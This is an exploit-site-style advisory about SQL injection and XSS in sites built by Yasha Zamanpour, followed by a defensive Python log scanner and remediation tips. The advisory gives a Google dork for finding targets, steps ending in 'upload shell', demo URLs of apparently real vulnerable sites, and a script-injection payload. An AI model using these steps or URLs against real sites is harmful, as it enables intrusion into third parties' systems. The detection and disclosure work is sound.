Yasha Zamanpour SQL Injection Vulnerability And XSS

2019.06.07
Mr Hashtag (IR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#######################
# Exploit Title: Yasha Zamanpour SQL Injection Vulnerability And XSS
# Exploit Author: MR (#)
# Vendor Homepage: www.zamanpour.com
# Google Dork: "Designed & Developed By Yasha Zamanpour" or "طراحي و اجرا: ياشا زمانپور"
# Tested On: Windows
# Exploit Risk: Medium
#######################
# SQL Injection
# 1_search google dork: "Designed & Developed By Yasha Zamanpour" or "طراحي و اجرا: ياشا زمانپور"
# 2_find target
# 3_admin page: /admin/main.php
# 4_upload shell
#
# demo:
# http://iap.ir/new/index.php?m_id=723
# http://www.isnutrition.ir/index.php?m_id=762
# http://www.pladaplast.com/enindex.php?m_id=820
#######################
# XSS
#
# code: "/><script>alert('Xss By MR (#)')</script>
#
# demo:
# http://www.visualartsjournal.ir
# http://www.isnutrition.ir/
# http://www.pladaplast.com/
#######################
# me:
# mr_h4shtag
#######################
# thanks to:
# mr_b3hz4d
#######################
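For operators of sites built on this code, one way to spot probing of the `m_id` parameter and markup injected into query strings from web server access logs. This is an added example, not part of the original advisory; the log lines, client addresses and the `q` and `ref` parameter names are constructed, since the advisory does not name the parameter affected by the XSS.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines; addresses are documentation ranges and the
# parameters "q" and "ref" are assumptions (not named in the advisory).
SAMPLE_LOG = '''\
203.0.113.5 - - [07/Jun/2019:10:00:01 +0000] "GET /index.php?m_id=723 HTTP/1.1" 200 5120
203.0.113.9 - - [07/Jun/2019:10:00:07 +0000] "GET /index.php?m_id=723%27 HTTP/1.1" 500 310
198.51.100.4 - - [07/Jun/2019:10:02:30 +0000] "GET /index.php?q=%22/%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4800
203.0.113.5 - - [07/Jun/2019:10:04:11 +0000] "GET /enindex.php?m_id=820 HTTP/1.1" 200 6100
198.51.100.7 - - [07/Jun/2019:10:05:42 +0000] "GET /index.php?m_id=762&ref=%3CScRiPt%3E HTTP/1.1" 200 5000
'''

# Client address, request target and status code from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# A script tag, or a quote followed by a tag close (the attribute breakout
# shape used by the payload in the advisory).
MARKUP_RE = re.compile(r'<\s*script|["\']\s*/?>', re.IGNORECASE)


def scan(log_text):
    """Return (client, parameter, reason) for each suspicious query parameter."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target, _status = match.groups()
        # parse_qsl percent-decodes, so encoded payloads are checked decoded.
        query = urlsplit(target).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            # m_id is used as a numeric record id in the advisory's demo URLs,
            # so anything other than ASCII digits is worth a look.
            if name == "m_id" and not re.fullmatch(r"[0-9]+", value):
                findings.append((client, name, "non-integer m_id"))
            if MARKUP_RE.search(value):
                findings.append((client, name, "markup in parameter"))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```

The same integer-only rule applies server-side: casting or rejecting `m_id` before it reaches the query, and HTML-encoding reflected values, removes both conditions the detector looks for.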

